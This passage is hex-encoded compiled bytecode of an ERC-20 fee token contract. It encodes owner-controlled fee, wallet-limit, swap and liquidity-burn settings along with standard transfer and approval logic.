00160006112b161299d565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546113339190614d34565b6129a5565b6001905092915050565b7f000000000000000000000000000000000000000000000000000000000000000081565b601360009054906101000a900460ff1681565b6000602160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b601a5481565b601360029054906101000a900460ff1681565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b61145e61299d565b73ffffffffffffffffffffffffffffffffffffffff1661147c61197b565b73ffffffffffffffffffffffffffffffffffffffff16146114d2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016114c990614b07565b60405180910390fd5b6114dc6000613965565b565b6114e661299d565b73ffffffffffffffffffffffffffffffffffffffff1661150461197b565b73ffffffffffffffffffffffffffffffffffffffff161461155a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161155190614b07565b60405180910390fd5b61025883101561159f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161159690614dfc565b60405180910390fd5b6103e882111580156115b2575060008210155b6115f1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115e890614e8e565b60405180910390fd5b82600f8190555081600d8190555080600e60006101000a81548160ff021916908315150217905550505050565b600061162861299d565b73ffffffffffffffffffffffffffffffffffffffff1661164661197b565b73ffffffffffffffffffffffffffffffffffffffff161461169c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161169390614b07565b60405180910390fd5b6000601360006101000a81548160ff0219169083151502179055506001905090565b6116c661299d565b73ffffffffffffffffffffffffffffffffffffffff166116e461197b565b73ffffffffffffffffffffffffffffffffffffffff161461173a576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161173190614b07565b60405180910390fd5b80602260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60175481565b6117c961299d565b73ffffffffffffffffffffffffffffffffffffffff166117e761197b565b73ffffffffffffffffffffffffffffffffffffffff161461183d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161183490614b07565b60405180910390fd5b8260178190555081601881905550806019819055506019546018546017546118659190614d34565b61186f9190614d34565b601681905550601460165411156118bb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118b290614efa565b60405180910390fd5b505050565b6118c861299d565b73ffffffffffffffffffffffffffffffffffffffff166118e661197b565b73ffffffffffffffffffffffffffffffffffffffff161461193c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161193390614b07565b60405180910390fd5b6001601360016101000a81548160ff0219169083151502179055506001601360026101000a81548160ff02191690831515021790555042601081905550565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b601b5481565b6119b361299d565b73ffffffffffffffffffffffffffffffffffffffff166119d161197b565b73ffffffffffffffffffffffffffffffffffffffff1614611a27576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a1e90614b07565b60405180910390fd5b80601360026101000a81548160ff02191690831515021790555050565b606060048054611a5390614a89565b80601f0160208091040260200160405190810160405280929190818152602001828054611a7f90614a89565b8015611acc5780601f10611aa157610100808354040283529160200191611acc565b820191906000526020600020905b815481529060010190602001808311611aaf57829003601f168201915b5050505050905090565b611ade61299d565b73ffffffffffffffffffffffffffffffffffffffff16611afc61197b565b73ffffffffffffffffffffffffffffffffffffffff1614611b52576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b4990614b07565b60405180910390fd5b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611be1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611bd890614f8c565b60405180910390fd5b611beb8282613a2b565b5050565b60195481565b60125481565b60205481565b601d5481565b60008060016000611c1661299d565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015611cd3576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611cca9061501e565b60405180910390fd5b611ce7611cde61299d565b858584036129a5565b600191505092915050565b60105481565b6000611d0c611d0561299d565b8484612b70565b6001905092915050565b611d1e61299d565b73ffffffffffffffffffffffffffffffffffffffff16611d3c61197b565b73ffffffffffffffffffffffffffffffffffffffff1614611d92576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d8990614b07565b60405180910390fd5b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167fa751787977eeb3902e30e1d19ca00c6ad274a1f622c31a206e32366700b0567460405160405180910390a380600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b60236020528060005260406000206000915054906101000a900460ff1681565b601360019054906101000a900460ff1681565b611e8d61299d565b73ffffffffffffffffffffffffffffffffffffffff16611eab61197b565b73ffffffffffffffffffffffffffffffffffffffff1614611f01576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ef890614b07565b60405180910390fd5b80602160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df782604051611f9e9190614738565b60405180910390a25050565b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b611fd861299d565b73ffffffffffffffffffffffffffffffffffffffff16611ff661197b565b73ffffffffffffffffffffffffffffffffffffffff161461204c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161204390614b07565b60405180910390fd5b82601b8190555081601c8190555080601d81905550601d54601c54601b546120749190614d34565b61207e9190614d34565b601a819055506028601a5411156120ca576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016120c19061508a565b60405180910390fd5b505050565b6120d761299d565b73ffffffffffffffffffffffffffffffffffffffff166120f561197b565b73ffffffffffffffffffffffffffffffffffffffff161461214b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161214290614b07565b60405180910390fd5b670de0b6b3a76400006103e86005612161611045565b61216b9190614b56565b6121759190614bdf565b61217f9190614bdf565b8110156121c1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016121b89061511c565b60405180910390fd5b670de0b6b3a7640000816121d59190614b56565b600c8190555050565b601560009054906101000a900460ff1681565b600a5481565b600061220161299d565b73ffffffffffffffffffffffffffffffffffffffff1661221f61197b565b73ffffffffffffffffffffffffffffffffffffffff1614612275576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161226c90614b07565b60405180910390fd5b620186a06001612283611045565b61228d9190614b56565b6122979190614bdf565b8210156122d9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016122d0906151ae565b60405180910390fd5b6103e860056122e6611045565b6122f09190614b56565b6122fa9190614bdf565b82111561233c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161233390615240565b60405180910390fd5b81600b8190555060019050919050565b60165481565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600b5481565b60006123e961299d565b73ffffffffffffffffffffffffffffffffffffffff1661240761197b565b73ffffffffffffffffffffffffffffffffffffffff161461245d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161245490614b07565b60405180910390fd5b6000601560006101000a81548160ff0219169083151502179055506001905090565b61248761299d565b73ffffffffffffffffffffffffffffffffffffffff166124a561197b565b73ffffffffffffffffffffffffffffffffffffffff16146124fb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016124f290614b07565b60405180910390fd5b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167ffaf1b77ed79f6e898c44dd8ab36b330c7b2fd39bcaab05ed6362480df870396560405160405180910390a380600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b60185481565b6125c961299d565b73ffffffffffffffffffffffffffffffffffffffff166125e761197b565b73ffffffffffffffffffffffffffffffffffffffff161461263d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161263490614b07565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1614156126ad576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016126a4906152d2565b60405180910390fd5b6126b681613965565b50565b601c5481565b600c5481565b60006126cf61299d565b73ffffffffffffffffffffffffffffffffffffffff166126ed61197b565b73ffffffffffffffffffffffffffffffffffffffff1614612743576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161273a90614b07565b60405180910390fd5b6011546012546127539190614d34565b4211612794576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161278b9061533e565b60405180910390fd5b6103e88211156127d9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016127d0906153d0565b60405180910390fd5b4260128190555060003073ffffffffffffffffffffffffffffffffffffffff166370a082317f00000000000000000000000000000000000000000000000000000000000000006040518263ffffffff1660e01b815260040161283b91906145a0565b602060405180830381865afa158015612858573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019061287c9190615405565b905060006128a76127106128998685613acc90919063ffffffff16565b613ae290919063ffffffff16565b905060008111156128e0576128df7f000000000000000000000000000000000000000000000000000000000000000061dead83613af8565b5b60007f000000000000000000000000000000000000000000000000000000000000000090508073ffffffffffffffffffffffffffffffffffffffff1663fff6cae96040518163ffffffff1660e01b8152600401600060405180830381600087803b15801561294d57600080fd5b505af1158015612961573d6000803e3d6000fd5b505050507f8462566617872a3fbab94534675218431ff9e204063ee3f4f43d965626a39abb60405160405180910390a160019350505050919050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415612a15576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612a0c906154a4565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415612a85576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612a7c90615536565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051612b639190614809565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415612be0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612bd7906155c8565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415612c50576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612c479061565a565b60405180910390fd5b6000811415612c6a57612c6583836000613af8565b613960565b601360009054906101000a900460ff161561338a57612c8761197b565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614158015612cf55750612cc561197b565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612d2e5750600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612d68575061dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612d815750600560149054906101000a900460ff16155b1561338957601360019054906101000a900460ff16612e7b57602160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680612e3b5750602160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b612e7a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612e71906156c6565b60405180910390fd5b5b601560009054906101000a900460ff161561304357612e9861197b565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614158015612f1f57507f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015612f7757507f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b156130425743601460003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205410612ffd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612ff49061577e565b60405180910390fd5b43601460003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5b602360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156130e65750602260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561318d57600a54811115613130576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161312790615810565b60405180910390fd5b600c5461313c8361140e565b826131479190614d34565b1115613188576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161317f9061587c565b60405180910390fd5b613388565b602360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156132305750602260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b156132dc57600a5481111561327a576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016132719061590e565b60405180910390fd5b6021600061dead73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16156132d7576132d661592e565b5b613387565b602260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1661338657600c546133398361140e565b826133449190614d34565b1115613385576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161337c9061587c565b60405180910390fd5b5b5b5b5b5b60006133953061140e565b90506000600b5482101590508080156133ba5750601360029054906101000a900460ff165b80156133d35750600560149054906101000a900460ff16155b80156134295750602360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b801561347f5750602160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b80156134d55750602160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15613519576001600560146101000a81548160ff0219169083151502179055506134fd613d79565b6000600560146101000a81548160ff0219169083151502179055505b600560149054906101000a900460ff1615801561357f5750602360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b80156135975750600e60009054906101000a900460ff165b80156135b25750600f546010546135ae9190614d34565b4210155b80156136085750602160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561361757613615614060565b505b6000600560149054906101000a900460ff16159050602160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806136cd5750602160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b156136d757600090505b6000811561395057602360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16801561373a57506000601a54115b15613807576137676064613759601a5488613acc90919063ffffffff16565b613ae290919063ffffffff16565b9050601a54601c548261377a9190614b56565b6137849190614bdf565b601f60008282546137959190614d34565b92505081905550601a54601d54826137ad9190614b56565b6137b79190614bdf565b602060008282546137c89190614d34565b92505081905550601a54601b54826137e09190614b56565b6137ea9190614bdf565b601e60008282546137fb9190614d34565b9250508190555061392c565b602360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16801561386257506000601654115b1561392b5761388f606461388160165488613acc90919063ffffffff16565b613ae290919063ffffffff16565b9050601654601854826138a29190614b56565b6138ac9190614bdf565b601f60008282546138bd9190614d34565b92505081905550601654601954826138d59190614b56565b6138df9190614bdf565b602060008282546138f09190614d34565b92505081905550601654601754826139089190614b56565b6139129190614bdf565b601e60008282546139239190614d34565b925050819055505b5b600081111561394157613940873083613af8565b5b808561394d919061595d565b94505b61395b878787613af8565b505050505b505050565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b80602360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b60008183613ada9190614b56565b905092915050565b60008183613af09190614bdf565b905092915050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415613b68576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401613b5f906155c8565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415613bd8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401613bcf9061565a565b60405180910390fd5b613be3838383614226565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015613c69576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401613c6090615a03565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254613cfc9190614d34565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051613d609190614809565b60405180910390a3613d7384848461422b565b50505050565b6000613d843061140e565b90506000602054601e54601f54613d9b9190614d34565b613da59190614d34565b9050600080831480613db75750600082145b15613dc45750505061405e565b6014600b54613dd39190614b56565b831115613dec576014600b54613de99190614b56565b92505b6000600283601f5486613dff9190614b56565b613e099190614bdf565b613e139190614bdf565b90506000613e2a828661423090919063ffffffff16565b90506000479050613e3a82614246565b6000613e4f824761423090919063ffffffff16565b90506000613e7a87613e6c601e5485613acc90919063ffffffff16565b613ae290919063ffffffff16565b90506000613ea588613e9760205486613acc90919063ffffffff16565b613ae290919063ffffffff16565b90506000818385613eb6919061595d565b613ec0919061595d565b90506000601f819055506000601e819055506000602081905550600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1682604051613f2090615a54565b60006040518083038185875af1925050503d8060008114613f5d576040519150601f19603f3d011682016040523d82523d6000602084013e613f62565b606091505b505080985050600087118015613f785750600081115b15613fc557613f878782614483565b7f17bbfb9a6069321b6ded73bd96327c9e6b7212a5cd51ff219cd61370acafb5618682601f54604051613fbc93929190615a69565b60405180910390a15b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff164760405161400b90615a54565b60006040518083038185875af1925050503d8060008114614048576040519150601f19603f3d011682016040523d82523d6000602084013e61404d565b606091505b505080985050505050505050505050505b565b60004260108190555060003073ffffffffffffffffffffffffffffffffffffffff166370a082317f00000000000000000000000000000000000000000000000000000000000000006040518263ffffffff1660e01b81526004016140c491906145a0565b602060405180830381865afa1580156140e1573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906141059190615405565b90506000614132612710614124600d5485613acc90919063ffffffff16565b613ae290919063ffffffff16565b9050600081111561416b5761416a7f000000000000000000000000000000000000000000000000000000000000000061dead83613af8565b5b60007f000000000000000000000000000000000000000000000000000000000000000090508073ffffffffffffffffffffffffffffffffffffffff1663fff6cae96040518163ffffffff1660e01b8152600401600060405180830381600087803b1580156141d857600080fd5b505af11580156141ec573d6000803e3d6000fd5b505050507f454c91ae84fcc766ddda0dcb289f26b3d0176efeacf4061fc219fa6ca8c3048d60405160405180910390a16001935050505090565b505050565b505050565b6000818361423e919061595d565b905092915050565b6000600267ffffffffffffffff81111561426357614262615aa0565b5b6040519080825280602002602001820160405280156142915781602001602082028036833780820191505090505b50905030816000815181106142a9576142a8615acf565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801561434e573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906143729190615b13565b8160018151811061438657614385615acf565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250506143eb307f0000000000000000000000000000000000000000000000000000000000000000846129a5565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663791ac9478360008430426040518663ffffffff1660e01b815260040161444d959493929190615c39565b600060405180830381600087803b15801561446757600080fd5b505af115801561447b573d6000803e3d6000fd5b505050505050565b6144ae307f0000000000000000000000000000000000000000000000000000000000000000846129a5565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663f305d71982308560008061dead426040518863ffffffff1660e01b815260040161451596959493929190615c93565b60606040518083038185885af1158015614533573d6000803e3d6000fd5b50505050506040513d601f19601f820116820180604052508101906145589190615cf4565b5050505050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600061458a8261455f565b9050919050565b61459a8161457f565b82525050565b60006020820190506145b56000830184614591565b92915050565b600081519050919050565b600082825260208201905092915050565b60005b838110156145f55780820151818401526020810190506145da565b83811115614604576000848401525b50505050565b6000601f19601f8301169050919050565b6000614626826145bb565b61463081856145c6565b93506146408185602086016145d7565b6146498161460a565b840191505092915050565b6000602082019050818103600083015261466e818461461b565b905092915050565b600080fd5b6146848161457f565b811461468f57600080fd5b50565b6000813590506146a18161467b565b92915050565b6000819050919050565b6146ba816146a7565b81146146c557600080fd5b50565b6000813590506146d7816146b1565b92915050565b600080604083850312156146f4576146f3614676565b5b600061470285828601614692565b9250506020614713858286016146c8565b9150509250929050565b60008115159050919050565b6147328161471d565b82525050565b600060208201905061474d6000830184614729565b92915050565b60006020828403121561476957614768614676565b5b600061477784828501614692565b91505092915050565b6000819050919050565b60006147a56147a061479b8461455f565b614780565b61455f565b9050919050565b60006147b78261478a565b9050919050565b60006147c9826147ac565b9050919050565b6147d9816147be565b82525050565b60006020820190506147f460008301846147d0565b92915050565b614803816146a7565b82525050565b600060208201905061481e60008301846147fa565b92915050565b60006020828403121561483a57614839614676565b5b6000614848848285016146c8565b91505092915050565b60008060006060848603121561486a57614869614676565b5b600061487886828701614692565b935050602061488986828701614692565b925050604061489a868287016146c8565b9150509250925092565b600060ff82169050919050565b6148ba816148a4565b82525050565b60006020820190506148d560008301846148b1565b92915050565b6148e48161471d565b81146148ef57600080fd5b50565b600081359050614901816148db565b92915050565b6000806000606084860312156149205761491f614676565b5b600061492e868287016146c8565b935050602061493f868287016146c8565b9250506040614950868287016148f2565b9150509250925092565b6000806040838503121561497157614970614676565b5b600061497f85828601614692565b9250506020614990858286016148f2565b9150509250929050565b6000806000606084860312156149b3576149b2614676565b5b60006149c1868287016146c8565b93505060206149d2868287016146c8565b92505060406149e3868287016146c8565b9150509250925092565b600060208284031215614a0357614a02614676565b5b6000614a11848285016148f2565b91505092915050565b60008060408385031215614a3157614a30614676565b5b6000614a3f85828601614692565b9250506020614a5085828601614692565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680614aa157607f821691505b60208210811415614ab557614ab4614a5a565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000614af16020836145c6565b9150614afc82614abb565b602082019050919050565b60006020820190508181036000830152614b2081614ae4565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000614b61826146a7565b9150614b6c836146a7565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0483118215151615614ba557614ba4614b27565b5b828202905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000614bea826146a7565b9150614bf5836146a7565b925082614c0557614c04614bb0565b5b828204905092915050565b7f43616e6e6f7420736574206d61785472616e73616374696f6e416d6f756e742060008201527f6c6f776572207468616e20302e31250000000000000000000000000000000000602082015250565b6000614c6c602f836145c6565b9150614c7782614c10565b604082019050919050565b60006020820190508181036000830152614c9b81614c5f565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b6000614cfe6028836145c6565b9150614d0982614ca2565b604082019050919050565b60006020820190508181036000830152614d2d81614cf1565b9050919050565b6000614d3f826146a7565b9150614d4a836146a7565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115614d7f57614d7e614b27565b5b828201905092915050565b7f63616e6e6f7420736574206275796261636b206d6f7265206f6674656e20746860008201527f616e206576657279203130206d696e7574657300000000000000000000000000602082015250565b6000614de66033836145c6565b9150614df182614d8a565b604082019050919050565b60006020820190508181036000830152614e1581614dd9565b9050919050565b7f4d75737420736574206175746f204c50206275726e2070657263656e7420626560008201527f747765656e20302520616e642031302500000000000000000000000000000000602082015250565b6000614e786030836145c6565b9150614e8382614e1c565b604082019050919050565b60006020820190508181036000830152614ea781614e6b565b9050919050565b7f4d757374206b656570206665657320617420323025206f72206c657373000000600082015250565b6000614ee4601d836145c6565b9150614eef82614eae565b602082019050919050565b60006020820190508181036000830152614f1381614ed7565b9050919050565b7f54686520706169722063616e6e6f742062652072656d6f7665642066726f6d2060008201527f6175746f6d617465644d61726b65744d616b6572506169727300000000000000602082015250565b6000614f766039836145c6565b9150614f8182614f1a565b604082019050919050565b60006020820190508181036000830152614fa581614f69565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006150086025836145c6565b915061501382614fac565b604082019050919050565b6000602082019050818103600083015261503781614ffb565b9050919050565b7f4d757374206b656570206665657320617420343025206f72206c657373000000600082015250565b6000615074601d836145c6565b915061507f8261503e565b602082019050919050565b600060208201905081810360008301526150a381615067565b9050919050565b7f43616e6e6f7420736574206d617857616c6c6574206c6f776572207468616e2060008201527f302e352500000000000000000000000000000000000000000000000000000000602082015250565b60006151066024836145c6565b9150615111826150aa565b604082019050919050565b60006020820190508181036000830152615135816150f9565b9050919050565b7f5377617020616d6f756e742063616e6e6f74206265206c6f776572207468616e60008201527f20302e3030312520746f74616c20737570706c792e0000000000000000000000602082015250565b60006151986035836145c6565b91506151a38261513c565b604082019050919050565b600060208201905081810360008301526151c78161518b565b9050919050565b7f5377617020616d6f756e742063616e6e6f74206265206869676865722074686160008201527f6e20302e352520746f74616c20737570706c792e000000000000000000000000602082015250565b600061522a6034836145c6565b9150615235826151ce565b604082019050919050565b600060208201905081810360008301526152598161521d565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006152bc6026836145c6565b91506152c782615260565b604082019050919050565b600060208201905081810360008301526152eb816152af565b9050919050565b7f4d757374207761697420666f7220636f6f6c646f776e20746f2066696e697368600082015250565b60006153286020836145c6565b9150615333826152f2565b602082019050919050565b600060208201905081810360008301526153578161531b565b9050919050565b7f4d6179206e6f74206e756b65206d6f7265207468616e20313025206f6620746f60008201527f6b656e7320696e204c5000000000000000000000000000000000000000000000602082015250565b60006153ba602a836145c6565b91506153c58261535e565b604082019050919050565b600060208201905081810360008301526153e9816153ad565b9050919050565b6000815190506153ff816146b1565b92915050565b60006020828403121561541b5761541a614676565b5b6000615429848285016153f0565b91505092915050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b600061548e6